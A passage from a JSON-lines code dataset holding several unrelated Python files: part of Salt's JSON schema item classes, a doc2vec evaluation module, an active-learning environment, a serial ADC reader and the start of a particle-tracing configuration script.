max_length = None\n\n def __init__(\n self,\n format=None, # pylint: disable=redefined-builtin\n pattern=None,\n min_length=None,\n max_length=None,\n **kwargs\n ):\n \"\"\"\n :param required:\n If the configuration item is required. Defaults to ``False``.\n :param title:\n A short explanation about the purpose of the data described by this item.\n :param description:\n A detailed explanation about the purpose of the data described by this item.\n :param default:\n The default value for this configuration item. May be :data:`.Null` (a special value\n to set the default value to null).\n :param enum:\n A list(list, tuple, set) of valid choices.\n :param format:\n A semantic format of the string (for example, ``\"date-time\"``, ``\"email\"``, or ``\"uri\"``).\n :param pattern:\n A regular expression (ECMA 262) that a string value must match.\n :param min_length:\n The minimum length\n :param max_length:\n The maximum length\n \"\"\"\n if format is not None: # pylint: disable=redefined-builtin\n self.format = format\n if pattern is not None:\n self.pattern = pattern\n if min_length is not None:\n self.min_length = min_length\n if max_length is not None:\n self.max_length = max_length\n super().__init__(**kwargs)\n\n def __validate_attributes__(self):\n if self.format is None and self.__format__ is not None:\n self.format = self.__format__\n\n\nclass EMailItem(StringItem):\n \"\"\"\n An internet email address, see `RFC 5322, section 3.4.1`__.\n\n .. __: http://tools.ietf.org/html/rfc5322\n \"\"\"\n\n __format__ = \"email\"\n\n\nclass IPv4Item(StringItem):\n \"\"\"\n An IPv4 address configuration field, according to dotted-quad ABNF syntax as defined in\n `RFC 2673, section 3.2`__.\n\n .. __: http://tools.ietf.org/html/rfc2673\n \"\"\"\n\n __format__ = \"ipv4\"\n\n\nclass IPv6Item(StringItem):\n \"\"\"\n An IPv6 address configuration field, as defined in `RFC 2373, section 2.2`__.\n\n .. __: http://tools.ietf.org/html/rfc2373\n \"\"\"\n\n __format__ = \"ipv6\"\n\n\nclass HostnameItem(StringItem):\n \"\"\"\n An Internet host name configuration field, see `RFC 1034, section 3.1`__.\n\n .. __: http://tools.ietf.org/html/rfc1034\n \"\"\"\n\n __format__ = \"hostname\"\n\n\nclass DateTimeItem(StringItem):\n \"\"\"\n An ISO 8601 formatted date-time configuration field, as defined by `RFC 3339, section 5.6`__.\n\n .. __: http://tools.ietf.org/html/rfc3339\n \"\"\"\n\n __format__ = \"date-time\"\n\n\nclass UriItem(StringItem):\n \"\"\"\n A universal resource identifier (URI) configuration field, according to `RFC3986`__.\n\n .. __: http://tools.ietf.org/html/rfc3986\n \"\"\"\n\n __format__ = \"uri\"\n\n\nclass SecretItem(StringItem):\n \"\"\"\n A string configuration field containing a secret, for example, passwords, API keys, etc\n \"\"\"\n\n __format__ = \"secret\"\n\n\nclass NumberItem(BaseSchemaItem):\n\n __type__ = \"number\"\n\n __serialize_attr_aliases__ = {\n \"multiple_of\": \"multipleOf\",\n \"exclusive_minimum\": \"exclusiveMinimum\",\n \"exclusive_maximum\": \"exclusiveMaximum\",\n }\n\n multiple_of = None\n minimum = None\n exclusive_minimum = None\n maximum = None\n exclusive_maximum = None\n\n def __init__(\n self,\n multiple_of=None,\n minimum=None,\n exclusive_minimum=None,\n maximum=None,\n exclusive_maximum=None,\n **kwargs\n ):\n \"\"\"\n :param required:\n If the configuration item is required. 
Defaults to ``False``.\n :param title:\n A short explanation about the purpose of the data described by this item.\n :param description:\n A detailed explanation about the purpose of the data described by this item.\n :param default:\n The default value for this configuration item. May be :data:`.Null` (a special value\n to set the default value to null).\n :param enum:\n A list(list, tuple, set) of valid choices.\n :param multiple_of:\n A value must be a multiple of this factor.\n :param minimum:\n The minimum allowed value\n :param exclusive_minimum:\n Whether a value is allowed to be exactly equal to the minimum\n :param maximum:\n The maximum allowed value\n :param exclusive_maximum:\n Whether a value is allowed to be exactly equal to the maximum\n \"\"\"\n if multiple_of is not None:\n self.multiple_of = multiple_of\n if minimum is not None:\n self.minimum = minimum\n if exclusive_minimum is not None:\n self.exclusive_minimum = exclusive_minimum\n if maximum is not None:\n self.maximum = maximum\n if exclusive_maximum is not None:\n self.exclusive_maximum = exclusive_maximum\n super().__init__(**kwargs)\n\n\nclass IntegerItem(NumberItem):\n __type__ = \"integer\"\n\n\nclass ArrayItem(BaseSchemaItem):\n __type__ = \"array\"\n\n __serialize_attr_aliases__ = {\n \"min_items\": \"minItems\",\n \"max_items\": \"maxItems\",\n \"unique_items\": \"uniqueItems\",\n \"additional_items\": \"additionalItems\",\n }\n\n items = None\n min_items = None\n max_items = None\n unique_items = None\n additional_items = None\n\n def __init__(\n self,\n items=None,\n min_items=None,\n max_items=None,\n unique_items=None,\n additional_items=None,\n **kwargs\n ):\n \"\"\"\n :param required:\n If the configuration item is required. Defaults to ``False``.\n :param title:\n A short explanation about the purpose of the data described by this item.\n :param description:\n A detailed explanation about the purpose of the data described by this item.\n :param default:\n The default value for this configuration item. 
May be :data:`.Null` (a special value\n to set the default value to null).\n :param enum:\n A list(list, tuple, set) of valid choices.\n :param items:\n Either of the following:\n * :class:`BaseSchemaItem` -- all items of the array must match the field schema;\n * a list or a tuple of :class:`fields <.BaseSchemaItem>` -- all items of the array must be\n valid according to the field schema at the corresponding index (tuple typing);\n :param min_items:\n Minimum length of the array\n :param max_items:\n Maximum length of the array\n :param unique_items:\n Whether all the values in the array must be distinct.\n :param additional_items:\n If the value of ``items`` is a list or a tuple, and the array length is larger than\n the number of fields in ``items``, then the additional items are described\n by the :class:`.BaseField` passed using this argument.\n :type additional_items: bool or :class:`.BaseSchemaItem`\n \"\"\"\n if items is not None:\n self.items = items\n if min_items is not None:\n self.min_items = min_items\n if max_items is not None:\n self.max_items = max_items\n if unique_items is not None:\n self.unique_items = unique_items\n if additional_items is not None:\n self.additional_items = additional_items\n super().__init__(**kwargs)\n\n def __validate_attributes__(self):\n if not self.items and not self.additional_items:\n raise RuntimeError(\"One of items or additional_items must be passed.\")\n if self.items is not None:\n if isinstance(self.items, (list, tuple)):\n for item in self.items:\n if not isinstance(item, (Schema, SchemaItem)):\n raise RuntimeError(\n \"All items passed in the item argument tuple/list must be \"\n \"a subclass of Schema, SchemaItem or BaseSchemaItem, \"\n \"not {}\".format(type(item))\n )\n elif not isinstance(self.items, (Schema, SchemaItem)):\n raise RuntimeError(\n \"The items argument passed must be a subclass of \"\n \"Schema, SchemaItem or BaseSchemaItem, not \"\n \"{}\".format(type(self.items))\n )\n\n def __get_items__(self):\n if isinstance(self.items, (Schema, SchemaItem)):\n # This is either a Schema or a Basetem, return it in its\n # serialized form\n return self.items.serialize()\n if isinstance(self.items, (tuple, list)):\n items = []\n for item in self.items:\n items.append(item.serialize())\n return items\n\n\nclass DictItem(BaseSchemaItem):\n\n __type__ = \"object\"\n\n __serialize_attr_aliases__ = {\n \"min_properties\": \"minProperties\",\n \"max_properties\": \"maxProperties\",\n \"pattern_properties\": \"patternProperties\",\n \"additional_properties\": \"additionalProperties\",\n }\n\n properties = None\n pattern_properties = None\n additional_properties = None\n min_properties = None\n max_properties = None\n\n def __init__(\n self,\n properties=None,\n pattern_properties=None,\n additional_properties=None,\n min_properties=None,\n max_properties=None,\n **kwargs\n ):\n \"\"\"\n :param required:\n If the configuration item is required. Defaults to ``False``.\n :type required:\n boolean\n :param title:\n A short explanation about the purpose of the data described by this item.\n :type title:\n str\n :param description:\n A detailed explanation about the purpose of the data described by this item.\n :param default:\n The default value for this configuration item. 
May be :data:`.Null` (a special value\n to set the default value to null).\n :param enum:\n A list(list, tuple, set) of valid choices.\n :param properties:\n A dictionary containing fields\n :param pattern_properties:\n A dictionary whose keys are regular expressions (ECMA 262).\n Properties match against these regular expressions, and for any that match,\n the property is described by the corresponding field schema.\n :type pattern_properties: dict[str -> :class:`.Schema` or\n :class:`.SchemaItem` or :class:`.BaseSchemaItem`]\n :param additional_properties:\n Describes properties that are not described by the ``properties`` or ``pattern_properties``.\n :type additional_properties: bool or :class:`.Schema` or :class:`.SchemaItem`\n or :class:`.BaseSchemaItem`\n :param min_properties:\n A minimum number of properties.\n :type min_properties: int\n :param max_properties:\n A maximum number of properties\n :type max_properties: int\n \"\"\"\n if properties is not None:\n self.properties = properties\n if pattern_properties is not None:\n self.pattern_properties = pattern_properties\n if additional_properties is not None:\n self.additional_properties = additional_properties\n if min_properties is not None:\n self.min_properties = min_properties\n if max_properties is not None:\n self.max_properties = max_properties\n super().__init__(**kwargs)\n\n def __validate_attributes__(self):\n if (\n not self.properties\n and not self.pattern_properties\n and not self.additional_properties\n ):\n raise RuntimeError(\n \"One of properties, pattern_properties or additional_properties must be\"\n \" passed\"\n )\n if self.properties is not None:\n if not isinstance(self.properties, (Schema, dict)):\n raise RuntimeError(\n \"The passed properties must be passed as a dict or \"\n \" a Schema not '{}'\".format(type(self.properties))\n )\n if not isinstance(self.properties, Schema):\n for key, prop in self.properties.items():\n if not isinstance(prop, (Schema, SchemaItem)):\n raise RuntimeError(\n \"The passed property who's key is '{}' must be of type \"\n \"Schema, SchemaItem or BaseSchemaItem, not \"\n \"'{}'\".format(key, type(prop))\n )\n if self.pattern_properties is not None:\n if not isinstance(self.pattern_properties, dict):\n raise RuntimeError(\n \"The passed pattern_properties must be passed as a dict \"\n \"not '{}'\".format(type(self.pattern_properties))\n )\n for key, prop in self.pattern_properties.items():\n if not isinstance(prop, (Schema, SchemaItem)):\n raise RuntimeError(\n \"The passed pattern_property who's key is '{}' must \"\n \"be of type Schema, SchemaItem or BaseSchemaItem, \"\n \"not '{}'\".format(key, type(prop))\n )\n if self.additional_properties is not None:\n if not isinstance(self.additional_properties, (bool, Schema, SchemaItem)):\n raise RuntimeError(\n \"The passed additional_properties must be of type bool, \"\n \"Schema, SchemaItem or BaseSchemaItem, not '{}'\".format(\n type(self.pattern_properties)\n )\n )\n\n def __get_properties__(self):\n if self.properties is None:\n return\n if isinstance(self.properties, Schema):\n return self.properties.serialize()[\"properties\"]\n properties = OrderedDict()\n for key, prop in self.properties.items():\n properties[key] = prop.serialize()\n return properties\n\n def __get_pattern_properties__(self):\n if self.pattern_properties is None:\n return\n pattern_properties = OrderedDict()\n for key, prop in self.pattern_properties.items():\n pattern_properties[key] = prop.serialize()\n return pattern_properties\n\n def 
__get_additional_properties__(self):\n if self.additional_properties is None:\n return\n if isinstance(self.additional_properties, bool):\n return self.additional_properties\n return self.additional_properties.serialize()\n\n def __call__(self, flatten=False):\n self.__flatten__ = flatten\n return self\n\n def serialize(self):\n result = super().serialize()\n required = []\n if self.properties is not None:\n if isinstance(self.properties, Schema):\n serialized = self.properties.serialize()\n if \"required\" in serialized:\n required.extend(serialized[\"required\"])\n else:\n for key, prop in self.properties.items():\n if prop.required:\n required.append(key)\n if required:\n result[\"required\"] = required\n return result\n\n\nclass RequirementsItem(SchemaItem):\n __type__ = \"object\"\n\n requirements = None\n\n def __init__(self, requirements=None):\n if requirements is not None:\n self.requirements = requirements\n super().__init__()\n\n def __validate_attributes__(self):\n if self.requirements is None:\n raise RuntimeError(\"The passed requirements must not be empty\")\n if not isinstance(self.requirements, (SchemaItem, list, tuple, set)):\n raise RuntimeError(\n \"The passed requirements must be passed as a list, tuple, \"\n \"set SchemaItem or BaseSchemaItem, not '{}'\".format(self.requirements)\n )\n\n if not isinstance(self.requirements, SchemaItem):\n if not isinstance(self.requirements, list):\n self.requirements = list(self.requirements)\n\n for idx, item in enumerate(self.requirements):\n if not isinstance(item, ((str,), SchemaItem)):\n raise RuntimeError(\n \"The passed requirement at the {} index must be of type \"\n \"str or SchemaItem, not '{}'\".format(idx, type(item))\n )\n\n def serialize(self):\n if isinstance(self.requirements, SchemaItem):\n requirements = self.requirements.serialize()\n else:\n requirements = []\n for requirement in self.requirements:\n if isinstance(requirement, SchemaItem):\n requirements.append(requirement.serialize())\n continue\n requirements.append(requirement)\n return {\"required\": requirements}\n\n\nclass OneOfItem(SchemaItem):\n\n __type__ = \"oneOf\"\n\n items = None\n\n def __init__(self, items=None, required=None):\n if items is not None:\n self.items = items\n super().__init__(required=required)\n\n def __validate_attributes__(self):\n if not self.items:\n raise RuntimeError(\"The passed items must not be empty\")\n if not isinstance(self.items, (list, tuple)):\n raise RuntimeError(\n \"The passed items must be passed as a list/tuple not '{}'\".format(\n type(self.items)\n )\n )\n for idx, item in enumerate(self.items):\n if not isinstance(item, (Schema, SchemaItem)):\n raise RuntimeError(\n \"The passed item at the {} index must be of type \"\n \"Schema, SchemaItem or BaseSchemaItem, not \"\n \"'{}'\".format(idx, type(item))\n )\n if not isinstance(self.items, list):\n self.items = list(self.items)\n\n def __call__(self, flatten=False):\n self.__flatten__ = flatten\n return self\n\n def serialize(self):\n return {self.__type__: [i.serialize() for i in self.items]}\n\n\nclass AnyOfItem(OneOfItem):\n\n __type__ = \"anyOf\"\n\n\nclass AllOfItem(OneOfItem):\n\n __type__ = \"allOf\"\n\n\nclass NotItem(SchemaItem):\n\n __type__ = \"not\"\n\n item = None\n\n def __init__(self, item=None):\n if item is not None:\n self.item = item\n super().__init__()\n\n def __validate_attributes__(self):\n if not self.item:\n raise RuntimeError(\"An item must be passed\")\n if not isinstance(self.item, (Schema, SchemaItem)):\n raise RuntimeError(\n \"The 
passed item be of type Schema, SchemaItem or \"\n \"BaseSchemaItem, not '{}'\".format(type(self.item))\n )\n\n def serialize(self):\n return {self.__type__: self.item.serialize()}\n\n\n# ----- Custom Preconfigured Configs -------------------------------------------------------------------------------->\nclass PortItem(IntegerItem):\n minimum = 0 # yes, 0 is a valid port number\n maximum = 65535\n\n\n# <---- Custom Preconfigured Configs ---------------------------------------------------------------------------------\n\n\nclass ComplexSchemaItem(BaseSchemaItem):\n \"\"\"\n .. versionadded:: 2016.11.0\n\n Complex Schema Item\n \"\"\"\n\n # This attribute is populated by the metaclass, but pylint fails to see it\n # and assumes it's not an iterable\n _attributes = []\n _definition_name = None\n\n def __init__(self, definition_name=None, required=None):\n super().__init__(required=required)\n self.__type__ = \"object\"\n self._definition_name = (\n definition_name if definition_name else self.__class__.__name__\n )\n # Schema attributes might have been added as class attributes so we\n # and they must be added to the _attributes attr\n self._add_missing_schema_attributes()\n\n def _add_missing_schema_attributes(self):\n \"\"\"\n Adds any missed schema attributes to the _attributes list\n\n The attributes can be class attributes and they won't be\n included in the _attributes list automatically\n \"\"\"\n for attr in [attr for attr in dir(self) if not attr.startswith(\"__\")]:\n attr_val = getattr(self, attr)\n if (\n isinstance(getattr(self, attr), SchemaItem)\n and attr not in self._attributes\n ):\n\n self._attributes.append(attr)\n\n @property\n def definition_name(self):\n return self._definition_name\n\n def serialize(self):\n \"\"\"\n The serialization of the complex item is a pointer to the item\n definition\n \"\"\"\n return {\"$ref\": \"#/definitions/{}\".format(self.definition_name)}\n\n def get_definition(self):\n \"\"\"Returns the definition of the complex item\"\"\"\n\n serialized = super().serialize()\n # Adjust entries in the serialization\n del serialized[\"definition_name\"]\n serialized[\"title\"] = self.definition_name\n\n properties = {}\n required_attr_names = []\n\n for attr_name in self._attributes:\n attr = getattr(self, attr_name)\n if attr and isinstance(attr, BaseSchemaItem):\n # Remove the attribute entry added by the base serialization\n del serialized[attr_name]\n properties[attr_name] = attr.serialize()\n properties[attr_name][\"type\"] = attr.__type__\n if attr.required:\n required_attr_names.append(attr_name)\n if serialized.get(\"properties\") is None:\n serialized[\"properties\"] = {}\n serialized[\"properties\"].update(properties)\n\n # Assign the required array\n if required_attr_names:\n serialized[\"required\"] = required_attr_names\n return serialized\n\n def get_complex_attrs(self):\n \"\"\"Returns a dictionary of the complex attributes\"\"\"\n return [\n getattr(self, attr_name)\n for attr_name in self._attributes\n if isinstance(getattr(self, attr_name), ComplexSchemaItem)\n ]\n\n\nclass DefinitionsSchema(Schema):\n \"\"\"\n .. 
versionadded:: 2016.11.0\n\n JSON schema class that supports ComplexSchemaItem objects by adding\n a definitions section to the JSON schema, containing the item definitions.\n\n All references to ComplexSchemaItems are built using schema inline\n dereferencing.\n \"\"\"\n\n @classmethod\n def serialize(cls, id_=None):\n # Get the initial serialization\n serialized = super().serialize(id_)\n complex_items = []\n # Augment the serializations with the definitions of all complex items\n aux_items = cls._items.values()\n\n # Convert dict_view object to a list on Python 3\n aux_items = list(aux_items)\n\n while aux_items:\n item = aux_items.pop(0)\n # Add complex attributes\n if isinstance(item, ComplexSchemaItem):\n complex_items.append(item)\n aux_items.extend(item.get_complex_attrs())\n\n # Handle container items\n if isinstance(item, OneOfItem):\n aux_items.extend(item.items)\n elif isinstance(item, ArrayItem):\n aux_items.append(item.items)\n elif isinstance(item, DictItem):\n if item.properties:\n aux_items.extend(item.properties.values())\n if item.additional_properties and isinstance(\n item.additional_properties, SchemaItem\n ):\n\n aux_items.append(item.additional_properties)\n\n definitions = OrderedDict()\n for config in complex_items:\n if isinstance(config, ComplexSchemaItem):\n definitions[config.definition_name] = config.get_definition()\n serialized[\"definitions\"] = definitions\n return serialized\n","repo_name":"saltstack/salt","sub_path":"salt/utils/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":55561,"program_lang":"python","lang":"en","doc_type":"code","stars":13606,"dataset":"github-code","pt":"78"} +{"seq_id":"71424577532","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 1 16:54:54 2017\n\n@author: Samuele Garda\n\"\"\"\nimport logging\nimport numpy as np\nfrom collections import OrderedDict,Counter\nfrom ml_metrics import apk\nfrom utils import majority_vote\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(format = '%(asctime)s : %(levelname)s : %(module)s: %(message)s', level = 'INFO') \n\n\nclass QualityChecker(object):\n \"\"\"\n Object performing quality check of document embeddings\n \"\"\"\n \n def __init__(self,models,corpus):\n \"\"\"\n Construct new object\n \"\"\"\n self.corpus = corpus\n self.models = models if isinstance(models,dict) else OrderedDict((str(model).replace('/','-'),model) for model in models)\n self.rand_id = np.random.randint(len(corpus))\n \n \n def current_losses(self):\n \"\"\"\n Log current loss for model.\n \n :param model: gensim.models\n \n \"\"\"\n for name,model in self.models:\n logger.info(\"{0} current loss {1}\".format(name,model.get_latest_training_loss()))\n \n def trained_most_similar(self,topk):\n \"\"\"\n Log `n_top` most similar documents to given random document.\n \n :param model: gensim model\n :param corpus: corpus\n :param n_top: n most similar\n \"\"\"\n for name,model in self.models.items():\n tag = self.corpus[self.rand_id].tags\n logger.info(\"{0} - training - most similar for {1} : {2}\\n\".format(name, tag, model.docvecs.most_similar(tag, topn=topk)))\n \n \n def inferred_most_similar(self,topk):\n \"\"\"\n Log `n_top` most similar documents to inferred vector for words present in random document.\n \n :param models: gensim model\n :param corpus: corpus\n :param n_top: n most similar\n \"\"\"\n for name,model in self.models.items():\n inferred_vector = model.infer_vector(self.corpus[self.rand_id].words)\n tag = self.corpus[self.rand_id].tags\n 
logger.info(\"{0} - inferred - most similar for {1} : {2}\\n\".format(name, tag, model.docvecs.most_similar([inferred_vector], topn=topk)))\n \n \n def base_check_from_config(self,config_train):\n \n log_train = config_train.getint('quality_check_infered')\n log_inferred = config_train.getint('quality_check_infered')\n \n if log_train:\n \n self.trained_most_similar(topk = log_train)\n \n if log_inferred:\n \n self.inferred_most_similar(topk = log_inferred)\n \n def count_ranks(self,models, corpus):\n \n for model_name,model in models.items():\n ranks = []\n for doc_id in range(len(corpus)):\n inferred_vector = model.infer_vector(corpus[doc_id].words)\n sims = model.docvecs.most_similar([inferred_vector], topn=len(model.docvecs))\n rank = [docid for docid, sim in sims].index(doc_id)\n ranks.append(rank)\n \n logger.info(\"Ranks count for {} : {}\".format(model_name,dict(Counter(ranks))))\n\ndef mapk_train_vectors(models,labels, k=10):\n \"\"\"\n Log model MAP@k scores of models.\n \n :params:\n \n models (dict) : dict (name,model)\n labels (dict) : dict mapping item to its recommendations\n k (int) : K in MAP@K\n \n \"\"\"\n \n logger.info(\"Starting evaluation process for MAP@{}...\".format(k))\n \n best_score = 0\n best_model = None\n \n for model in models:\n \n predictions = {}\n \n for doc_id in labels.keys():\n try:\n predictions[doc_id] = [l[0] for l in model.docvecs.most_similar(doc_id,topn = k)]\n except TypeError:\n pass\n \n mapk = np.mean([apk(labels[doc_id],predictions[doc_id],k) for doc_id in labels.keys() if doc_id in predictions.keys()])\n logger.info(\"{0} - MAP@{1} : {2}\\n\".format(str(model),k, mapk))\n \n if mapk > best_score:\n best_score = mapk\n best_model = str(model)\n \n logger.info(\"Best model with MAP@{0} = {1} : {2} \\n \".format(k,best_score,best_model))\n \n \ndef evaluate_tpr_indices(models,corpus,topk):\n \"\"\"\n Evaluate document embeddings with TPR. For each document in `test_set` infer vector and find `k` nearest document (cosine similarity).\n Take majority vote on the inferred labels.\n \n :params:\n \n models (dict) : dict (name,model) of gensim.Doc2Vec models to be tested\n test_set (list) : list of docuemnts in namedtuple format. 
Thet MUST have at least `words` and `tags` attributes\n topk (int) : how many documents to predict\n \n \"\"\"\n \n logger.info(\"Starting evaluation process - TPR@{}\\n\".format(topk))\n \n tl_list = [doc.tags[0].split('\\t')[0] for doc in corpus]\n \n unique_names = set(tl_list)\n \n label2index = {name : i for i,name in enumerate(unique_names,start = 1)}\n \n index2lable = {v : k for k,v in label2index.items()}\n \n true_labels = np.asarray([label2index[l] for l in tl_list])\n \n labels_count = Counter(true_labels)\n \n for model in models:\n \n logger.info(\"\\nEvaluating `{}`\".format(str(model)))\n \n logger.info(\"Inferring vectors for {} documents\".format(len(corpus)))\n \n inferred_vectors = [model.infer_vector(doc.words) for doc in corpus]\n \n most_similars = [model.docvecs.most_similar([inf_vec], topn=topk) for inf_vec in inferred_vectors]\n \n all_votes = [[news.split('\\t')[0] for (news,score) in ms] for ms in most_similars]\n \n predicted = np.asarray([label2index[majority_vote(votes)[0]] for votes in all_votes])\n \n scores = {}\n \n for label,count in labels_count.items():\n \n by_class_pred = np.where(predicted != label,0,label)\n \n hits = np.sum(by_class_pred == true_labels)\n \n scores[index2lable[label]] = hits / count\n \n logger.info(\"TPR@10 : {}\".format(scores))\n \n logger.info(\"Average TPR@10 : {}\".format(np.sum(predicted==true_labels)/len(true_labels)))\n \n \n\n \n \n \n \n \n \n# \n#def get_most_median_least_similar(model,corpus,rand_id):\n# \"\"\"\n# Print most,median,least similar documents to a random document.\n# \n# :param model: gensim model\n# :param corpus: corpus\n# \"\"\"\n# sims = model.docvecs.most_similar(rand_id, topn=model.docvecs.count)\n# logger.info(u'TARGET (%d): «%s»\\n' % (rand_id, ' '.join(corpus[rand_id].words)))\n# logger.info(u'SIMILAR/DISSIMILAR DOCS PER MODEL %s:\\n' % model)\n# for label, index in [('MOST', 0), ('MEDIAN', len(sims)//2), ('LEAST', len(sims) - 1)]:\n# logger.info(u'%s %s: «%s»\\n' % (label, sims[index], ' '.join(corpus[sims[index][0]].words)))\n \n \n \n","repo_name":"julian-risch/ICADL2018","sub_path":"quality_check.py","file_name":"quality_check.py","file_ext":"py","file_size_in_byte":6370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"35141707372","text":"from typing import List\nfrom math import ceil\nimport copy\n\nimport numpy as np\n\nfrom supervised_learning_tasks.task_supervised import TaskSupervised\nfrom AL_environment_MDP.al_mdp_observation import Observation\n\n\nclass ALEnvironment():\n\n def __init__(self, al_parameters, task: TaskSupervised):\n al_parameters.annotationBudget = min(al_parameters.annotationBudget, task.get_no_training_samples())\n self.task = task\n self.al_parameters = al_parameters\n\n def step(self, action: List[int], verbose=True) -> (Observation, float, bool, dict):\n\n subset_IDs = [self.unlabelled_IDs[i] for i in action]\n\n # if batchSize is larger than remaining annotation budget, reduce samples to label\n remaining_budget = self.al_parameters.annotationBudget - (len(self.labelled_IDs) + len(self.batch))\n if len(subset_IDs) > remaining_budget:\n subset_IDs = list(subset_IDs[:remaining_budget])\n\n # update sets: put subset_IDs from labelled set to batch\n self.batch += subset_IDs\n old_no_unlabelled_IDs = len(self.unlabelled_IDs)\n self.unlabelled_IDs = copy.copy(list(set(self.unlabelled_IDs) - set(subset_IDs)))\n if len(self.unlabelled_IDs) != old_no_unlabelled_IDs - len(subset_IDs):\n raise ValueError\n\n # 
perform update\n epoch_finished = len(self.labelled_IDs) + len(self.batch) >= self.al_parameters.annotationBudget\n if len(self.batch) == self.al_parameters.batch_size_annotation or epoch_finished:\n # update sets: put IDs from batch to labelled_IDs\n self.labelled_IDs = copy.copy(self.labelled_IDs + self.batch)\n self.batch = []\n\n # retrain supervised learning model\n loss, accuracy = self.task.train_on_batch(self.labelled_IDs)\n reward = self.oldInfo[\"loss\"] - loss\n\n # calculate Info\n info = dict()\n info[\"loss\"] = loss\n info[\"no_labelled_samples\"] = len(self.labelled_IDs)\n info[\"accuracy\"] = accuracy\n\n observation = self.define_observation()\n else:\n observation = self.oldObservation\n observation.update_features_based_on_action(action)\n\n reward = 0\n info = self.oldInfo\n info[\"no_labelled_samples\"] = len(self.labelled_IDs)\n\n self.oldObservation = observation\n self.oldInfo = info\n\n return observation, reward, epoch_finished, info\n\n def reset(self) -> Observation:\n\n # define labelled and unlabelled Set by their IDs\n self.labelled_IDs = list(np.random.randint(0, self.task.get_no_training_samples(), self.al_parameters.startingSize))\n # print(f\"labelled IDs: {self.labelled_IDs}\")\n allIDs = list(range(self.task.get_no_training_samples()))\n self.unlabelled_IDs = list(set(allIDs) - set(self.labelled_IDs))\n self.batch = []\n\n # define accuracy\n loss, accuracy = self.task.train_on_batch(self.labelled_IDs)\n\n # calculate Info\n info = dict()\n info[\"loss\"] = loss\n info[\"no_labelled_samples\"] = len(self.labelled_IDs)\n info[\"accuracy\"] = accuracy\n # self.initialInfo = info\n\n observation = self.define_observation()\n\n self.oldObservation = observation\n self.oldInfo = info\n\n return observation\n\n def render(self, mode='human'):\n raise NotImplementedError\n\n def define_observation(self) -> Observation:\n observation = Observation(self.task, self.labelled_IDs, self.unlabelled_IDs, self.batch)\n return observation\n\n def expected_number_iterations(self) -> int:\n expectedNoIterations = self.al_parameters.annotationBudget - self.al_parameters.startingSize\n return expectedNoIterations\n","repo_name":"MalteEbner/Learning-active-learning-with-ensembles-of-active-learning-agents","sub_path":"AL_environment_MDP/al_environment.py","file_name":"al_environment.py","file_ext":"py","file_size_in_byte":3787,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"70097506173","text":"import argparse, sys, os\nimport serial.tools.list_ports\n\navailable_ports = serial.tools.list_ports.comports()\nprint(\"\\nAvailable serial ports:\")\nprint(' '.join([x.name for x in available_ports])+ '\\n')\n\nparser = argparse.ArgumentParser(description='Read byte values from UART')\nparser.add_argument('com', metavar='COMX', type=str,\n help=\"Name the serial port from the list above\")\nparser.add_argument('--baud', metavar='BAUD_RATE', type=int, default=115200,\n help=\"Baud rate (default 115200)\")\nargs = parser.parse_args()\n\n# Open the serial port\ntimeout_seconds = 1\nser = serial.Serial(args.com, args.baud, timeout=timeout_seconds)\n\nprint(f\"Opening {args.com} with baud rate {args.baud}. 
Press Ctrl+C to break.\\n\")\n\ntry:\n while True:\n bytes_to_read = 2\n read_bytes = ser.read(bytes_to_read)\n if read_bytes == b'':\n print(f\"Read timed out after {timeout_seconds} seconds\")\n exit(1)\n \n MSB = read_bytes[0]\n LSB = read_bytes[1]\n\n DAC = (MSB << 8) + LSB\n # print(f\"DAC: {DAC} raw value \")\n if (DAC < 0):\n DAC = (1<<15) + DAC\n else:\n if (DAC & (1<<15)) != 0:\n DAC = DAC - (1<<15)\n #DAC = (0x7FFF - DAC) + 1 # binary compliment\n #DAC = ~DAC + 1 # binary compliment\n if ((MSB & 0x80) == 0x80):\n DAC = DAC - 32768\n\n val = DAC\n \n # Print decimal number and a horizontal bar of #### chars\n max_cols = os.get_terminal_size().columns - 6\n bar_width_cols = val * (max_cols / (32767))\n print(f'{val:-5d} ' + '#' * round(bar_width_cols))\n\nexcept KeyboardInterrupt:\n sys.exit()\n\n","repo_name":"HaraldBlab/vhdl-projects","sub_path":"ads1115_reader/ads1115_demo/ads1115_demo_serial.py","file_name":"ads1115_demo_serial.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19002237369","text":"#!/usr/bin/env python\n\"\"\"\nuser_{...}.py is the main user-facing interface to trochograph, a test-particle\ntracing program. This user file serves as both\n* configuration: user specifies input parameters, fields, particles\n* main program: calls run_trochograph(...) to start the evolution loop.\n\nUsage:\n\n NUMBA_NUM_THREADS={xx} python user_{...}.py\n\n\"\"\"\n\nfrom __future__ import division, print_function\nimport numba\nimport numpy as np\n#import matplotlib.pyplot as plt\nfrom os import path\n\nimport faulthandler\nfaulthandler.enable()\n\nfrom mark import TristanRun\nfrom trochograph import Fields, Particles, interp, run_trochograph, tprint\n\n# global prtl arrays: struct w/ p.{x,y,z,u,v,w,ind,proc}\n# global fld arrays: flds.{ex,ey,ez,bx,by,bz}\n# global scalar constants: par.{c,qm}\n\n# user must provide parameters: c, interval, lapst, last, pltstart, qm\n# and also fields and prtls, of course\n\nRUNDIR = \"/rigel/astro/users/at3222/aaron_heating/mi400Ms4betap0.25theta25phi90_1d_comp20_ntimes64_later\"\nRUN = TristanRun(RUNDIR)\nSCENE = RUN[0]\n\nU0 = 1.6863e-2 # inflow velocity\nUSH = 0.036684958 # shock velocity, Gamma=5/3 assumed\nVBOOST = USH - U0 # non-rel boost from lab to shock frame, so vboost > 0 points along +\\hat{x}\n\ndef user_input():\n \"\"\"Define a bunch of input parameters\"\"\"\n par = {}\n\n #